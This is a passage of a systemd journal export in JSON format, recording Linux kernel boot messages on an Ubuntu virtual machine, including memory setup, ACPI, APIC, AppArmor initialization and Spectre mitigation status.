"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=72;b=e2b08827b5804427b422c10c84f1567e;m=558631;t=5bd16dd190599;x=1cc3c8a9c9dd7901", "__REALTIME_TIMESTAMP" : "1615280779888025", "__MONOTONIC_TIMESTAMP" : "5604913", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Built 1 zonelists, mobility grouping on. 
Total pages: 515941" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=73;b=e2b08827b5804427b422c10c84f1567e;m=55863a;t=5bd16dd1905a1;x=e8caf151eb66e06b", "__REALTIME_TIMESTAMP" : "1615280779888033", "__MONOTONIC_TIMESTAMP" : "5604922", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Policy zone: DMA32" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=74;b=e2b08827b5804427b422c10c84f1567e;m=558646;t=5bd16dd1905ae;x=b008d01b5689d4df", "__REALTIME_TIMESTAMP" : "1615280779888046", "__MONOTONIC_TIMESTAMP" : "5604934", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "MESSAGE" : "Kernel command line: BOOT_IMAGE=/boot/vmlinuz-4.15.0-60-generic root=LABEL=cloudimg-rootfs ro console=tty1 console=ttyS0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=75;b=e2b08827b5804427b422c10c84f1567e;m=558653;t=5bd16dd1905ba;x=258fad1740261764", "__REALTIME_TIMESTAMP" : "1615280779888058", "__MONOTONIC_TIMESTAMP" : "5604947", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "Calgary: detecting Calgary via BIOS EBDA area" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=76;b=e2b08827b5804427b422c10c84f1567e;m=55865c;t=5bd16dd1905c3;x=7d6fd6818753d72d", "__REALTIME_TIMESTAMP" : "1615280779888067", "__MONOTONIC_TIMESTAMP" : "5604956", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : 
"0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "Calgary: Unable to locate Rio Grande table in EBDA - bailing!" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=77;b=e2b08827b5804427b422c10c84f1567e;m=55866d;t=5bd16dd1905d4;x=5a5325e226ebce28", "__REALTIME_TIMESTAMP" : "1615280779888084", "__MONOTONIC_TIMESTAMP" : "5604973", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Memory: 2015744K/2096616K available (12300K kernel code, 2481K rwdata, 4172K rodata, 2436K init, 2384K bss, 80872K reserved, 0K cma-reserved)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=78;b=e2b08827b5804427b422c10c84f1567e;m=558679;t=5bd16dd1905e0;x=dff864ad4aaca487", "__REALTIME_TIMESTAMP" : "1615280779888096", "__MONOTONIC_TIMESTAMP" : "5604985", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "SLUB: HWalign=64, Order=0-3, MinObjects=0, CPUs=1, Nodes=1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=79;b=e2b08827b5804427b422c10c84f1567e;m=558682;t=5bd16dd1905ea;x=dc4b1bb083f70bbb", "__REALTIME_TIMESTAMP" : "1615280779888106", "__MONOTONIC_TIMESTAMP" : "5604994", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Kernel/User page tables isolation: enabled" } { 
"__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=7a;b=e2b08827b5804427b422c10c84f1567e;m=55868c;t=5bd16dd1905f3;x=ebb66b6d607ac266", "__REALTIME_TIMESTAMP" : "1615280779888115", "__MONOTONIC_TIMESTAMP" : "5605004", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ftrace: allocating 39306 entries in 154 pages" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=7b;b=e2b08827b5804427b422c10c84f1567e;m=558695;t=5bd16dd1905fd;x=25b7cc341a5cb139", "__REALTIME_TIMESTAMP" : "1615280779888125", "__MONOTONIC_TIMESTAMP" : "5605013", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4000", "MESSAGE" : "Hierarchical RCU implementation." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=7c;b=e2b08827b5804427b422c10c84f1567e;m=5586a0;t=5bd16dd190607;x=a8784248f36b171c", "__REALTIME_TIMESTAMP" : "1615280779888135", "__MONOTONIC_TIMESTAMP" : "5605024", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4000", "MESSAGE" : "\u0009RCU restricting CPUs from NR_CPUS=8192 to nr_cpu_ids=1." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=7d;b=e2b08827b5804427b422c10c84f1567e;m=5586a9;t=5bd16dd190611;x=17cad42f92f96745", "__REALTIME_TIMESTAMP" : "1615280779888145", "__MONOTONIC_TIMESTAMP" : "5605033", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4000", "MESSAGE" : "\u0009Tasks RCU enabled." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=7e;b=e2b08827b5804427b422c10c84f1567e;m=5586b3;t=5bd16dd19061a;x=778621a60a8168", "__REALTIME_TIMESTAMP" : "1615280779888154", "__MONOTONIC_TIMESTAMP" : "5605043", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4000", "MESSAGE" : "RCU: Adjusting geometry for rcu_fanout_leaf=16, nr_cpu_ids=1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=7f;b=e2b08827b5804427b422c10c84f1567e;m=5586bc;t=5bd16dd190623;x=b92fdbd20060c1c5", "__REALTIME_TIMESTAMP" : "1615280779888163", "__MONOTONIC_TIMESTAMP" : "5605052", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4000", "MESSAGE" : "NR_IRQS: 524544, nr_irqs: 256, preallocated irqs: 16" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=80;b=e2b08827b5804427b422c10c84f1567e;m=5586c5;t=5bd16dd19062c;x=b490850fd15c6fe2", "__REALTIME_TIMESTAMP" : "1615280779888172", "__MONOTONIC_TIMESTAMP" : "5605061", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", 
"_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4000", "MESSAGE" : "Console: colour VGA+ 80x25" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=81;b=e2b08827b5804427b422c10c84f1567e;m=5586dd;t=5bd16dd190644;x=90cdd9c6a302efe4", "__REALTIME_TIMESTAMP" : "1615280779888196", "__MONOTONIC_TIMESTAMP" : "5605085", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4000", "MESSAGE" : "console [tty1] enabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=82;b=e2b08827b5804427b422c10c84f1567e;m=5586e6;t=5bd16dd19064d;x=710e7e5bf1ae139d", "__REALTIME_TIMESTAMP" : "1615280779888205", "__MONOTONIC_TIMESTAMP" : "5605094", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4000", "MESSAGE" : "console [ttyS0] enabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=83;b=e2b08827b5804427b422c10c84f1567e;m=5586f1;t=5bd16dd190659;x=b0d667d63ba34732", "__REALTIME_TIMESTAMP" : "1615280779888217", "__MONOTONIC_TIMESTAMP" : "5605105", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4000", "MESSAGE" : "ACPI: Core revision 20170831" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=84;b=e2b08827b5804427b422c10c84f1567e;m=5586fa;t=5bd16dd190662;x=92661cfbe6db2a18", "__REALTIME_TIMESTAMP" : "1615280779888226", "__MONOTONIC_TIMESTAMP" : "5605114", "_BOOT_ID" : 
"e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4000", "MESSAGE" : "ACPI: 1 ACPI AML tables successfully acquired and loaded" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=85;b=e2b08827b5804427b422c10c84f1567e;m=558703;t=5bd16dd19066a;x=d6d886985107b215", "__REALTIME_TIMESTAMP" : "1615280779888234", "__MONOTONIC_TIMESTAMP" : "5605123", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4012", "MESSAGE" : "APIC: Switch to symmetric I/O mode setup" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=86;b=e2b08827b5804427b422c10c84f1567e;m=55870c;t=5bd16dd190673;x=a1961cb49536ff59", "__REALTIME_TIMESTAMP" : "1615280779888243", "__MONOTONIC_TIMESTAMP" : "5605132", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "6594", "MESSAGE" : "x2apic enabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=87;b=e2b08827b5804427b422c10c84f1567e;m=558715;t=5bd16dd19067d;x=4c6f848de3d9c0ee", "__REALTIME_TIMESTAMP" : "1615280779888253", "__MONOTONIC_TIMESTAMP" : "5605141", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "8004", "MESSAGE" : "Switched APIC routing to physical x2apic." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=88;b=e2b08827b5804427b422c10c84f1567e;m=55871f;t=5bd16dd190686;x=f1b82f3ef3a09e2b", "__REALTIME_TIMESTAMP" : "1615280779888262", "__MONOTONIC_TIMESTAMP" : "5605151", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "12682", "MESSAGE" : "..TIMER: vector=0x30 apic1=0 pin1=2 apic2=-1 pin2=-1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=89;b=e2b08827b5804427b422c10c84f1567e;m=558728;t=5bd16dd19068f;x=7bc3ec2567970a35", "__REALTIME_TIMESTAMP" : "1615280779888271", "__MONOTONIC_TIMESTAMP" : "5605160", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "15744", "MESSAGE" : "tsc: Detected 2099.990 MHz processor" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=8a;b=e2b08827b5804427b422c10c84f1567e;m=558734;t=5bd16dd19069c;x=e94f89dba5e05079", "__REALTIME_TIMESTAMP" : "1615280779888284", "__MONOTONIC_TIMESTAMP" : "5605172", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "16012", "MESSAGE" : "Calibrating delay loop (skipped) preset value.. 
4199.98 BogoMIPS (lpj=8399960)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=8b;b=e2b08827b5804427b422c10c84f1567e;m=55873d;t=5bd16dd1906a5;x=adc6f086387cee55", "__REALTIME_TIMESTAMP" : "1615280779888293", "__MONOTONIC_TIMESTAMP" : "5605181", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "20003", "MESSAGE" : "pid_max: default: 32768 minimum: 301" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=8c;b=e2b08827b5804427b422c10c84f1567e;m=558746;t=5bd16dd1906ae;x=141973390bbbd033", "__REALTIME_TIMESTAMP" : "1615280779888302", "__MONOTONIC_TIMESTAMP" : "5605190", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "24037", "MESSAGE" : "Security Framework initialized" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=8d;b=e2b08827b5804427b422c10c84f1567e;m=558752;t=5bd16dd1906b9;x=f69cac992562d9c6", "__REALTIME_TIMESTAMP" : "1615280779888313", "__MONOTONIC_TIMESTAMP" : "5605202", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "26234", "MESSAGE" : "Yama: becoming mindful." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=8e;b=e2b08827b5804427b422c10c84f1567e;m=55875b;t=5bd16dd1906c3;x=a5e24fb83560b6c7", "__REALTIME_TIMESTAMP" : "1615280779888323", "__MONOTONIC_TIMESTAMP" : "5605211", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "28043", "MESSAGE" : "AppArmor: AppArmor initialized" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=8f;b=e2b08827b5804427b422c10c84f1567e;m=558764;t=5bd16dd1906cc;x=6c308ef50c3a5d50", "__REALTIME_TIMESTAMP" : "1615280779888332", "__MONOTONIC_TIMESTAMP" : "5605220", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "32056", "MESSAGE" : "Dentry cache hash table entries: 262144 (order: 9, 2097152 bytes)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=90;b=e2b08827b5804427b422c10c84f1567e;m=55876e;t=5bd16dd1906d5;x=b89ec68ac8b48021", "__REALTIME_TIMESTAMP" : "1615280779888341", "__MONOTONIC_TIMESTAMP" : "5605230", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "36034", "MESSAGE" : "Inode-cache hash table entries: 131072 (order: 8, 1048576 bytes)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=91;b=e2b08827b5804427b422c10c84f1567e;m=558777;t=5bd16dd1906de;x=d5cbd363193285fd", "__REALTIME_TIMESTAMP" : "1615280779888350", "__MONOTONIC_TIMESTAMP" : "5605239", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", 
"SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "39434", "MESSAGE" : "Mount-cache hash table entries: 4096 (order: 3, 32768 bytes)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=92;b=e2b08827b5804427b422c10c84f1567e;m=558780;t=5bd16dd1906e7;x=fa98366b38acd874", "__REALTIME_TIMESTAMP" : "1615280779888359", "__MONOTONIC_TIMESTAMP" : "5605248", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "40006", "MESSAGE" : "Mountpoint-cache hash table entries: 4096 (order: 3, 32768 bytes)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=93;b=e2b08827b5804427b422c10c84f1567e;m=558789;t=5bd16dd1906f0;x=3f1c170ea1e6bf54", "__REALTIME_TIMESTAMP" : "1615280779888368", "__MONOTONIC_TIMESTAMP" : "5605257", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "44336", "MESSAGE" : "Last level iTLB entries: 4KB 0, 2MB 0, 4MB 0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=94;b=e2b08827b5804427b422c10c84f1567e;m=558792;t=5bd16dd1906f9;x=cf6fcc04e36b3efb", "__REALTIME_TIMESTAMP" : "1615280779888377", "__MONOTONIC_TIMESTAMP" : "5605266", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "48003", "MESSAGE" : "Last level dTLB entries: 4KB 0, 2MB 0, 4MB 0, 1GB 0" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=95;b=e2b08827b5804427b422c10c84f1567e;m=55879b;t=5bd16dd190703;x=58189c75c4c81c80", "__REALTIME_TIMESTAMP" : "1615280779888387", "__MONOTONIC_TIMESTAMP" : "5605275", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "52004", "MESSAGE" : "Spectre V1 : Mitigation: usercopy/swapgs barriers and __user pointer sanitization" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=96;b=e2b08827b5804427b422c10c84f1567e;m=5587b5;t=5bd16dd19071d;x=ef7fdd149e9c0257", "__REALTIME_TIMESTAMP" : "1615280779888413", "__MONOTONIC_TIMESTAMP" : "5605301", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "56003", "MESSAGE" : "Spectre V2 : Mitigation: Full generic retpoline" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=97;b=e2b08827b5804427b422c10c84f1567e;m=5587e2;t=5bd16dd19074a;x=89029417d35b153e", "__REALTIME_TIMESTAMP" : "1615280779888458", "__MONOTONIC_TIMESTAMP" : "5605346", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "58337", "MESSAGE" : "Spectre V2 : Spectre v2 / SpectreRSB mitigation: Filling RSB on context switch" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=98;b=e2b08827b5804427b422c10c84f1567e;m=5587ed;t=5bd16dd190755;x=a1c31d80f87bf9a1", "__REALTIME_TIMESTAMP" : "1615280779888469", "__MONOTONIC_TIMESTAMP" : "5605357", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", 
"SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "60002", "MESSAGE" : "Spectre V2 : Enabling Restricted Speculation for firmware calls" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=99;b=e2b08827b5804427b422c10c84f1567e;m=5587f7;t=5bd16dd19075f;x=61abf76af5eb1488", "__REALTIME_TIMESTAMP" : "1615280779888479", "__MONOTONIC_TIMESTAMP" : "5605367", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "64013", "MESSAGE" : "Spectre V2 : mitigation: Enabling conditional Indirect Branch Prediction Barrier" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=9a;b=e2b08827b5804427b422c10c84f1567e;m=558802;t=5bd16dd190769;x=c2b3c220b9500653", "__REALTIME_TIMESTAMP" : "1615280779888489", "__MONOTONIC_TIMESTAMP" : "5605378", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", 